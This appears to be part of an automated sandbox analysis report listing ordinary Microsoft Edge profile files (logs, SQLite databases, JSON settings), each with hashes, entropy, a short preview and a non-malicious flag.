                                                                                                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:[]

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports~RF46b1a.TMP (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:[]

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Sdch Dictionaries (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):40
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                      MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                      SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                      SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                      SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Trust Tokens

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):36864
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.3886039372934488
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
                                                                                                                                                                                                                                                                                      MD5:DEA619BA33775B1BAEEC7B32110CB3BD
                                                                                                                                                                                                                                                                                      SHA1:949B8246021D004B2E772742D34B2FC8863E1AAA
                                                                                                                                                                                                                                                                                      SHA-256:3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
                                                                                                                                                                                                                                                                                      SHA-512:7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\ac5b5b96-0cd6-4421-b333-f44f0c51ba28.tmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:[]

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\edcaa3f9-3b82-4780-ac31-4dbed81d4704.tmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:[]

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\f01f8d55-e87b-4c5d-be70-a86e491fea41.tmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:[]

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\000003.log

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):80
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.4921535629071894
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
                                                                                                                                                                                                                                                                                      MD5:69449520FD9C139C534E2970342C6BD8
                                                                                                                                                                                                                                                                                      SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
                                                                                                                                                                                                                                                                                      SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
                                                                                                                                                                                                                                                                                      SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:*...#................version.1..namespace-..&f.................&f...............

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):426
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.247234481998988
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:oQevVaYebvqBZFUt8rQd/+rQiF5OaYebvqBaJ:mVaYebvyg8NXOaYebvL
                                                                                                                                                                                                                                                                                      MD5:87E0B186E303BD13C94E91A78F5A62C8
                                                                                                                                                                                                                                                                                      SHA1:1C01FC755F5E21A4750F7EE8091052CFB046920E
                                                                                                                                                                                                                                                                                      SHA-256:46DED1558FE64889ADA3F9A2B06C5D2FDB135670D22D80EA8ACDE1026483D4B6
                                                                                                                                                                                                                                                                                      SHA-512:A29334DBCC1A4AC1843F8902E7956E54AD13F679D78549AD1592E14D6E6B5AD9273C10F2839334E4E76AA391D7FDF9790F411FC627578DB57F49A1B0335C77A2
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:2024/11/20-04:54:51.974 13d4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/11/20-04:54:51.983 13d4 Recovering log #3.2024/11/20-04:54:51.986 13d4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG.old (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):426
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.247234481998988
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:oQevVaYebvqBZFUt8rQd/+rQiF5OaYebvqBaJ:mVaYebvyg8NXOaYebvL
                                                                                                                                                                                                                                                                                      MD5:87E0B186E303BD13C94E91A78F5A62C8
                                                                                                                                                                                                                                                                                      SHA1:1C01FC755F5E21A4750F7EE8091052CFB046920E
                                                                                                                                                                                                                                                                                      SHA-256:46DED1558FE64889ADA3F9A2B06C5D2FDB135670D22D80EA8ACDE1026483D4B6
                                                                                                                                                                                                                                                                                      SHA-512:A29334DBCC1A4AC1843F8902E7956E54AD13F679D78549AD1592E14D6E6B5AD9273C10F2839334E4E76AA391D7FDF9790F411FC627578DB57F49A1B0335C77A2
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:2024/11/20-04:54:51.974 13d4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/11/20-04:54:51.983 13d4 Recovering log #3.2024/11/20-04:54:51.986 13d4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):332
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.172040158478516
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:HIQJgq2PN723oH+TcwtpIFUt8YIQJBZmw+YIQJbkwON723oH+Tcwta/WLJ:oQJgvVaYebmFUt8rQJB/+rQJb5OaYeb7
                                                                                                                                                                                                                                                                                      MD5:9343A2E9E6431C20ACCACA1821272ABB
                                                                                                                                                                                                                                                                                      SHA1:EE618B9137D3D6B63685B59A7053F4209D0095B6
                                                                                                                                                                                                                                                                                      SHA-256:485FCBEB7CF669F0C94A6888845249E157EF152495AF812117AC39455DB281A5
                                                                                                                                                                                                                                                                                      SHA-512:6A7BD5866BA1494313ECAFCA22A58E29927943595D1296D64A3DE5CF263C79DA84C5E2C9F440B425AC6FBD50CB94121258F37DA81F290A269E45D218CFFC8FB0
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:2024/11/20-04:54:31.671 1fc0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/11/20-04:54:31.671 1fc0 Recovering log #3.2024/11/20-04:54:31.671 1fc0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG.old (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):332
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.172040158478516
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:HIQJgq2PN723oH+TcwtpIFUt8YIQJBZmw+YIQJbkwON723oH+Tcwta/WLJ:oQJgvVaYebmFUt8rQJB/+rQJb5OaYeb7
                                                                                                                                                                                                                                                                                      MD5:9343A2E9E6431C20ACCACA1821272ABB
                                                                                                                                                                                                                                                                                      SHA1:EE618B9137D3D6B63685B59A7053F4209D0095B6
                                                                                                                                                                                                                                                                                      SHA-256:485FCBEB7CF669F0C94A6888845249E157EF152495AF812117AC39455DB281A5
                                                                                                                                                                                                                                                                                      SHA-512:6A7BD5866BA1494313ECAFCA22A58E29927943595D1296D64A3DE5CF263C79DA84C5E2C9F440B425AC6FBD50CB94121258F37DA81F290A269E45D218CFFC8FB0
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:2024/11/20-04:54:31.671 1fc0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/11/20-04:54:31.671 1fc0 Recovering log #3.2024/11/20-04:54:31.671 1fc0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x37, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):196608
                                                                                                                                                                                                                                                                                      Entropy (8bit):1.2677421984367483
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:384:L/2qOB1nxCkM0SA1LyKOMq+8iP5GDHP/0jMVumo:Kq+n0J091LyKOMq+8iP5GLP/0F
                                                                                                                                                                                                                                                                                      MD5:F54B2ECFD5BE38BE45EEEC2FBEE3B2CA
                                                                                                                                                                                                                                                                                      SHA1:5EFE10606259552F14ABD86BE4A7122A7DA6AE2B
                                                                                                                                                                                                                                                                                      SHA-256:430965BD20705E3BA3F4E5F7249A1FAA54DDC1FC7B5732D872C02DAAA47F7FEC
                                                                                                                                                                                                                                                                                      SHA-512:BF9C46F28C00E72FBAF0D662FBB1CCDE6BAD9A347BF3F7DDAFCB1BF21796C64EA7370C518894F3E50570B6A6D430B4DF0C663B4EC9CD6F0716A1743E89253CF2
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......[...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\WebStorage\QuotaManager

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):40960
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.4664103408840079
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcB0OZ:v7doKsKuKZKlZNmu46yjx0U
                                                                                                                                                                                                                                                                                      MD5:1F91087920946138650D33136C86470B
                                                                                                                                                                                                                                                                                      SHA1:0FA83289A982988C8296125CE3F5554C56543DDF
                                                                                                                                                                                                                                                                                      SHA-256:D91C9EE67E4704503EBD3A5DE424620C50BC3D07B0BF4CA5E1A4005C5228F9BE
                                                                                                                                                                                                                                                                                      SHA-512:571A137495D984148447A43A13ACB98BAA99D91F71E8D992A241BD55C57302B5B0004002F38E84EA18B4B92D29406A03056B6E26450B088EEF7E19AC008C0965
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.......w..g...........M...w..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\a10946d9-714d-4af9-8055-08bfdddb016a.tmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):115717
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                      MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                      SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                      SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                      SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\arbitration_service_config.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):11755
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.190465908239046
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
                                                                                                                                                                                                                                                                                      MD5:07301A857C41B5854E6F84CA00B81EA0
                                                                                                                                                                                                                                                                                      SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
                                                                                                                                                                                                                                                                                      SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
                                                                                                                                                                                                                                                                                      SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\databases\Databases.db

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):28672
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.3410017321959524
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
                                                                                                                                                                                                                                                                                      MD5:98643AF1CA5C0FE03CE8C687189CE56B
                                                                                                                                                                                                                                                                                      SHA1:ECADBA79A364D72354C658FD6EA3D5CF938F686B
                                                                                                                                                                                                                                                                                      SHA-256:4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
                                                                                                                                                                                                                                                                                      SHA-512:68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g.....P....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-shm

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):32768
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.10252021481203348
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:Gu0wJyz3i00wJyz3t589XCChslotGLNl0ml/Vl/Vl/Vl/Vl/Vl/Vl/Vl/Vl/Vl/c:+wfwYspEjVl/PnnnnnnnnnnnvoQ/Eou
                                                                                                                                                                                                                                                                                      MD5:C49EEC5D54777056A3748D3E5411E821
                                                                                                                                                                                                                                                                                      SHA1:8EE14F2A0742442221FE503D7D118D03E82BF533
                                                                                                                                                                                                                                                                                      SHA-256:CEE6DC0B2C47467848AF786B73428C5ED7CDA8C676EEA0C3D0ECFBBFEE9112ED
